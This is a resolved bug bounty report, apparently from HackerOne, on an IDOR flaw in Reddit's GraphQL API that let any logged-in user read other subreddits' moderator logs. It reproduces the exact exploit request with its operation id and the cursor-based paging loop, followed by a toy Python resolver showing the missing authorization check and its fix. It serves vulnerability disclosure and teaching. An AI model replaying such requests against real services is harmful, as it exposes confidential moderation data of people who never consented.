
Getting access of mod logs from any public or restricted subreddit with IDOR vulnerability

High
R
Reddit
Reported by high_ping_ninja

Vulnerability Details

Technical details and impact analysis

Insecure Direct Object Reference (IDOR)
## Summary:

There is no check whether the user is a moderator of the particular subreddit while trying to access the mod logs via gql.reddit.com using the operation id. You can change the parameter **subredditName** to any target subreddit name which is public or restricted and get access to the mod logs of that subreddit.

## Steps To Reproduce:

+ Log into any account as an attacker and get the authorization token
+ Send the request given below to gql.reddit.com

```
POST / HTTP/2
Host: gql.reddit.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 62
X-Reddit-Compression: 1
Origin: https://www.reddit.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Authorization: Bearer ourtoken
Referer: https://www.reddit.com/
Te: trailers

{"id":"6243efcbc61d","variables":{"subredditName":"any-subreddit"}}
```

The response will look something like below

{F1851522}

+ It only gives one page of logs. Look at the response and see whether the value of **hasNextPage** is true or false. If it's false then there are no more logs other than the ones we got.
+ If it's true then there are more logs, and we can get them by adding a new variable **after** and assigning it the value of **endCursor**, which we can see in the response body of our request

{F1851533}

+ The final request body will look something like this

```
{"id":"6243efcbc61d","variables":{"subredditName":"any-subreddit", "after":"code-from-endCursor" }}
```

+ After sending the request we'll get the second page of logs. If we still get **hasNextPage** as true, keep doing this until we see **hasNextPage** set to false in the response. By doing this we can get all the pages of mod logs one by one.

> Use this script to make things easier in confirming this vulnerability (F1851561)
> The output will get stored in mod_log_out.txt in the same directory

* [attachment / reference] F1851522 F1851533 F1851561

## Impact

Confidential information getting exposed.
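As an added example (not Reddit's code and not the report's script), the toy resolver below shows the missing authorization check the report describes beside the fixed version, using the same **hasNextPage**/**endCursor** pagination; the subreddit names, user names and log entries are constructed.

```python
"""Toy mod-log resolver: vulnerable (IDOR) vs. fixed. Added example, not Reddit code."""


class Forbidden(Exception):
    """Raised when the caller does not moderate the requested subreddit."""


# Constructed fixture: which users moderate which subreddit, and each mod log.
MODERATORS = {"examplesub": {"alice"}, "privatesub": {"bob"}}
MOD_LOGS = {
    "examplesub": [f"examplesub-entry-{i}" for i in range(5)],
    "privatesub": [f"privatesub-entry-{i}" for i in range(3)],
}
PAGE_SIZE = 2


def _page(entries, after):
    """Cursor pagination: 'after' is the endCursor of the previous page (an index here)."""
    start = 0 if after is None else int(after) + 1
    page = entries[start:start + PAGE_SIZE]
    end = start + len(page) - 1
    return {
        "entries": page,
        "pageInfo": {"hasNextPage": end + 1 < len(entries),
                     "endCursor": str(end) if page else None},
    }


def mod_log_vulnerable(user, subreddit_name, after=None):
    """The bug: the log is looked up directly from the client-supplied variable.
    The caller is authenticated but never authorized against that subreddit."""
    return _page(MOD_LOGS[subreddit_name], after)


def mod_log_fixed(user, subreddit_name, after=None):
    """Fix: authorize against the resolved object before returning anything.
    Unknown and unauthorized subreddits get the same error, so the endpoint
    does not reveal which names exist."""
    if user not in MODERATORS.get(subreddit_name, set()):
        raise Forbidden("caller is not a moderator of this subreddit")
    return _page(MOD_LOGS[subreddit_name], after)


def fetch_all(resolver, user, subreddit_name):
    """Walk the pages exactly as the report describes (after = endCursor)."""
    out, after = [], None
    while True:
        page = resolver(user, subreddit_name, after)
        out.extend(page["entries"])
        if not page["pageInfo"]["hasNextPage"]:
            return out
        after = page["pageInfo"]["endCursor"]
```

With the fixed resolver a non-moderator is refused on the first page, so the pagination loop never starts.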

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$5000.00

Submitted

Weakness

Insecure Direct Object Reference (IDOR)